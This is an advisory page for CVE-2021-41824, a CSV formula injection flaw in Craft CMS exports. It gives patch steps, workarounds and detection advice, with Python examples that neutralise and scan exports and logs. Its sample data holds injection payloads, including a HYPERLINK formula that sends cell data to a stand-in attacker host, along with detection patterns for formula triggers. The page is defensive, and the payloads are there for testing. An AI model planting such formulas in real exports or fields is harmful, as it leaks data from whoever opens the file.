CVE-2021-41824

8.8 HIGH

📋 TL;DR

CVE-2021-41824 is a CSV (formula) injection vulnerability in Craft CMS before 3.7.14. Text controlled by a less trusted user (an entry field, a username, a front-end form submission) is written into control panel CSV exports without neutralising a leading =, +, -, @, tab or carriage return. When an editor opens such an export in Excel, LibreOffice Calc or Google Sheets, the cell is evaluated as a formula: it can leak other cells to an attacker-controlled server (HYPERLINK, IMPORTXML-style functions) or, where DDE is enabled and the user clicks through the prompts, launch a local command. The Craft server itself is not compromised; the victim is whoever opens the file.

💻 Affected Systems

Products:
  • Craft CMS
Versions: All versions before 3.7.14
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: CSV export is a stock control panel feature, so any installation before 3.7.14 in which a less trusted user can get text into exportable content (entries, user profiles, front-end or guest submissions) is affected by default.

📦 What is this software?

Craft CMS is a PHP content management system from Pixel & Tonic, built on the Yii framework. Its control panel lists elements (entries, users, assets and so on) in element indexes that editors can export as CSV; that export path is where this vulnerability lives.

⚠️ Risk & Real-World Impact

🔴

Worst Case

A victim opens a malicious export in Excel with DDE still available and accepts the "update links" / "start application" prompts; the formula launches a command on the victim's workstation, giving the attacker code execution on an administrator's machine and a path to the CMS credentials and data it holds. Excel prompts before starting another application and Microsoft has published settings to disable DDE outright, so this path depends on the victim clicking through or on an unhardened install; it remains realistic on unmanaged or legacy desktops.

🟠

Likely Case

An attacker who can save text that editors later export (a registered user's profile, a guest entry, a public form) plants a HYPERLINK or external-data formula. When an editor opens the export in a spreadsheet, the formula sends cell contents to an attacker-controlled URL, hides or rewrites rows, or tricks the user into accepting a DDE prompt. No server-side access is gained.

🟢

If Mitigated

With proper user education and security controls, impact is limited to potential data manipulation within spreadsheets without system compromise.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation needs a way to store text that ends up in an export (a low-privileged account or a public form that feeds content) plus user interaction: an editor must open the CSV in a spreadsheet rather than a text editor. The injection itself is trivial and the payload formulas are well documented.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 3.7.14

Vendor Advisory: https://github.com/craftcms/cms/security/advisories/GHSA-h7vq-5qgw-jwwq

Restart Required: No

Instructions:

1. Back up the Craft installation and its database before updating.
2. Update Craft via Composer from the project root: composer require "craftcms/cms:^3.7.14" (the constraint is quoted so the caret survives in every shell).
3. Run any pending migrations: php craft migrate/all
4. Clear caches: php craft clear-caches/all
5. Confirm the new version in the control panel or with composer show craftcms/cms.

🔧 Temporary Workarounds

Disable CSV Export

Platform: all

Until the update is applied, stop staff using the control panel's CSV export (or restrict control panel access to trusted accounts), and treat any export already produced from user-supplied content as untrusted.

Input Sanitization

Platform: all

Neutralise values on the way out rather than trying to validate them on the way in: any cell whose first character is =, +, -, @, a tab or a carriage return gets a single-quote prefix, every field is wrapped in double quotes, and embedded double quotes are doubled (the OWASP CSV injection recommendation). Rejecting such input at save time is unreliable, because legitimate values (negative numbers, @handles, text starting with a dash) begin with the same characters, and because content that is already stored still gets exported.

🧯 If You Can't Patch

  • Treat CSV exports from an unpatched Craft site as untrusted: open them in a text editor first, or import them into the spreadsheet with every column typed as Text, instead of double-clicking the file
  • Harden the spreadsheet side: in Excel, enable "Ignore other applications that use Dynamic Data Exchange (DDE)" (Options > Advanced), roll out Microsoft's DDE hardening settings via Group Policy where possible, and keep the external-content and data-connection warnings enabled so HYPERLINK/DDE cells cannot fire silently
  • Limit who can save content that ends up in exports (front-end forms, guest entries, self-registration) and who is allowed to run exports

🔍 How to Verify

Check if Vulnerable:

Check Craft CMS version in admin panel or via 'composer show craftcms/cms' command.

Check Version:

composer show craftcms/cms | grep version

Verify Fix Applied:

Confirm the installed version is 3.7.14 or later, then test the behaviour directly: create (or have a low-privileged test account create) an entry whose text field contains a value such as =1+1, export that element index as CSV from the control panel, and inspect the file in a plain text editor rather than a spreadsheet. The leading formula character must no longer reach the cell unneutralised (for example, it is prefixed with a single quote). Do not open an untested export in Excel to check it.
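Added example, not Craft's code and not from the advisory: the neutralisation rule described under Input Sanitization and the check called for in the verification step, in Python. export_rows writes rows the way a safe exporter should (every field quoted, embedded quotes doubled, leading formula characters prefixed with a single quote; neutralize=False reproduces the vulnerable behaviour for comparison), and find_formula_cells scans any CSV text, such as a file downloaded from the control panel, for cells a spreadsheet would still evaluate. The sample rows and the attacker.example host are constructed; the function names are this example's own.

```python
import csv
import io

# Leading characters that Excel, LibreOffice Calc and Google Sheets treat as the
# start of a formula (the set in OWASP's CSV injection guidance). Tab and CR are
# included because "\t=1+1" is still evaluated after import.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Constructed sample export, not real Craft data. Three cells carry classic
# payloads; "-2+3" shows that a harmless-looking value is neutralised too.
SAMPLE_ROWS = [
    ["username", "bio"],
    ["alice", "Plain text biography"],
    ["bob", '=HYPERLINK("https://attacker.example/?"&A2,"open me")'],
    ["carol", "-2+3"],
    ["dave", "@SUM(1+1)"],
    ["erin", "\t=1+1"],
]


def is_formula_cell(value):
    """True if a spreadsheet would evaluate this cell rather than display it."""
    return isinstance(value, str) and value[:1] in FORMULA_TRIGGERS


def neutralize_cell(value):
    """Prefix a formula cell with a single quote so it is shown as literal text.
    Non-strings pass through. Trade-off: "-2+3" is exported as the text '-2+3."""
    return "'" + value if is_formula_cell(value) else value


def export_rows(rows, neutralize=True):
    """Serialise rows to CSV text the way a safe exporter should.
    QUOTE_ALL wraps every field in double quotes and doubles embedded quotes, so a
    payload cannot close its own cell; neutralize=True also defuses formula cells.
    neutralize=False reproduces the vulnerable behaviour for comparison."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize_cell(v) if neutralize else v for v in row])
    return buf.getvalue()


def find_formula_cells(csv_text):
    """Scan CSV text and return (row, column, value) for every cell a spreadsheet
    would evaluate. An empty list means the export is safe to open."""
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, value in enumerate(row):
            if is_formula_cell(value):
                hits.append((r, c, value))
    return hits


if __name__ == "__main__":
    unsafe = export_rows(SAMPLE_ROWS, neutralize=False)
    print("vulnerable export:", find_formula_cells(unsafe))                   # four hits
    print("patched export:  ", find_formula_cells(export_rows(SAMPLE_ROWS)))  # []
```

To check a real download, read the file with newline="" and pass its contents to find_formula_cells; any hit is a cell that would fire when opened. The single-quote prefix is the widely used neutralisation; it changes how a spreadsheet displays legitimate negative numbers, which is the cost of being safe by default.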

📡 Detection & Monitoring

Log Indicators:

  • Save requests (entries, users, guest-entry or front-end form submissions) whose field values begin with =, +, -, @, a tab or a carriage return; this is where the payload enters, usually well before any export
  • CSV export requests from accounts that do not normally export, or shortly after a suspicious save
  • Matching on formula characters anywhere in a request is useless: every key=value pair contains "="; match on the decoded first character of each value instead

Network Indicators:

  • Large CSV downloads from the Craft control panel to unexpected clients or at unusual times
  • On the workstation that opens the file: the spreadsheet process (e.g. EXCEL.EXE) making outbound HTTP or DNS requests to unfamiliar hosts, or spawning cmd.exe / powershell.exe; this comes from endpoint telemetry, not from Craft's logs

SIEM Query:

Splunk-style pseudo-query; the field names (source, uri, form_data) depend on how your pipeline indexes Craft's access and application logs, and form_data assumes request bodies are logged at all. It matches the URL-encoded first character of a parameter value rather than "=" anywhere in the request, because every key=value pair contains "=" and a naive wildcard match flags every request.

source="craftcms" AND (uri="*/save-entry*" OR uri="*/save-user*" OR uri="*/save-*")
| regex form_data="(^|&)[^=&]+=(%3D|%2B|%40|-|%09|%0D)"
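Added example, not Craft's code and not from the page: the log indicators above turned into a check that runs over sample lines. The log format is an assumption: a combined-style access log extended with a body="…" field holding the URL-encoded POST body, because plain access logs do not record bodies and the payload travels in a save request, not in the export request. The Craft routes in the sample lines (entries/save-entry, users/save-user, element-indexes/export), the IP addresses and the attacker.example host are constructed for the example; suspicious_params and scan_log are this example's own names.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Same trigger set as OWASP's CSV injection guidance.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Constructed log lines (assumed format: access log + URL-encoded request body).
LOG_LINES = [
    '203.0.113.5 - - [10/Oct/2021:12:00:01 +0000] "POST /actions/entries/save-entry HTTP/1.1" 200 512 '
    'body="title=Hello&fields%5Bbio%5D=Plain+text"',
    '203.0.113.9 - - [10/Oct/2021:12:00:07 +0000] "POST /actions/entries/save-entry HTTP/1.1" 200 512 '
    'body="title=%3DHYPERLINK%28%22https%3A%2F%2Fattacker.example%2F%3F%22%26A1%29&fields%5Bbio%5D=ok"',
    '198.51.100.2 - - [10/Oct/2021:12:01:00 +0000] "GET /index.php?p=admin/actions/element-indexes/export'
    '&elementType=craft%5Celements%5CEntry&criteria%5Bid%5D=1 HTTP/1.1" 200 204800 body=""',
    '203.0.113.11 - - [10/Oct/2021:12:02:00 +0000] "POST /actions/users/save-user HTTP/1.1" 200 100 '
    'body="username=%40SUM%281%2B1%29&email=x%40example.com"',
]

LINE_RE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d+) (?P<bytes>\d+) '
    r'body="(?P<body>[^"]*)"'
)


def suspicious_params(line):
    """Return (name, decoded value) for every query-string or body parameter whose
    decoded value *begins* with a formula trigger. Testing the decoded first
    character avoids the noise of matching '=' anywhere (every key=value has one)
    and ignores '@' inside e-mail addresses."""
    m = LINE_RE.search(line)
    if not m:
        return []
    params = parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True)
    params += parse_qsl(m["body"], keep_blank_values=True)
    return [(k, v) for k, v in params if v[:1] in FORMULA_TRIGGERS]


def scan_log(lines, export_min_bytes=100_000):
    """Walk log lines and return (index, kind, detail) findings:
    'formula-trigger' for saves carrying a formula-leading value (where the
    payload enters), 'large-export' for big export downloads (where it leaves)."""
    findings = []
    for i, line in enumerate(lines):
        for key, value in suspicious_params(line):
            findings.append((i, "formula-trigger", f"{key}={value!r}"))
        m = LINE_RE.search(line)
        if m and "export" in m["target"] and int(m["bytes"]) >= export_min_bytes:
            findings.append((i, "large-export", m["target"]))
    return findings


if __name__ == "__main__":
    for finding in scan_log(LOG_LINES):
        print(*finding)
```

The export line produces no formula-trigger finding even though its query string is full of "=": the payload is never in the export request, which is why detection has to look at the save side. Expect legitimate hits on values such as negative numbers or text starting with a dash; correlate a formula-trigger save with a later export of the same section before escalating.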

🔗 References

  • Vendor advisory: https://github.com/craftcms/cms/security/advisories/GHSA-h7vq-5qgw-jwwq
  • NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2021-41824